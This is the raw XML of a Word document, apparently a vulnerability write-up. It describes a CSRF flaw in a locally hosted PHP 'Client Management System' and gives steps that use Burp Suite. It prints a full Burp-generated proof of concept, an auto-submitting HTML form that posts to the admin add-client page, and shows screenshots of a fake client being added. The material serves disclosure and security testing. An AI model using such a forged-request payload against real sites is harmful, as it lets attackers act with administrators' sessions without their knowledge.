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highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="red"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VULNERABILITY : CSRF LEADS TO ADDING FAKE CLIENT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STEP:-1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004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Set up the Environment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Locally host a website named Client Management System</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using MySQL and PHP.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Ensure the website includes functionality for adding the clients and their services.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STEP:-2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C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Login as Admin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By using the given username and password into the Client Management System.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Poc 1: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997200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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STEP:3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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Add the new Client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Select the add client option and enter the required client details.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Poc 2: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832100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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Poc 3: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806700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STEP:4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Capture the Client adding Request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Navigate to the Save button on the website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Before clicking the Save button, Set up </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Suite</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to intercept the request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Save button and capture the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> request, before it hit the server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Send the captured request to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Repeater tab in Burp Suite</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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PoC 4: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4864100"/>
            <wp:effectExtent b="0" l="0" r="0" t="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6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STEP:5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Use the captured adding client  request to generate a CSRF Proof-of-Concept</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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(PoC):</w:t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&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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&lt;!-- CSRF PoC - generated by Burp Suite Professional --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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&lt;form action="http://localhost/clientms/admin/add-client.php" method="POST"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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name="accounttype" value="Active&amp;#32;Account" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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name="cname" value="moulimurugan" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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name="comname" value="kppr" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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name="address" value="vijayamangalam" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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name="city" value="erode" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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name="state" value="tamil" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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name="zcode" value="638026" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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name="wphnumber" value="968560710" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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name="cellphnumber" value="6931052465" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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name="ophnumber" value="9638560410" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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name="email" value="moulimurugan&amp;#64;gmail&amp;#46;com" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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name="password" value="moulimurugan" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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name="websiteadd" value="clientmsdb" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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name="notes" value="Nil" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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type="hidden" name="submit" value="" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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&lt;input type="submit" value="Submit request" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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history.pushState('', '', '/');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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  document.forms[0].submit();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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  &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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  &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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&lt;/html&gt;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Copy the link to the Poc file and prepare it for testing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PoC 5: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832100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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STEP :6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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Test the CRRF PoC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Edit the existing details of client1 to client2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the link generated in above PoC5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the webpage open with the submit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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we hit the submit button the new client is added to the dashboard in the PoC 9 and PoC 8.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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PoC 6 :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812800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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PoC 7: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686612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66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PoC 8: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997200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9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PoC 9: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2832100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8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jpg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpg"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.jpg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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14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image" Target="media/image6.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7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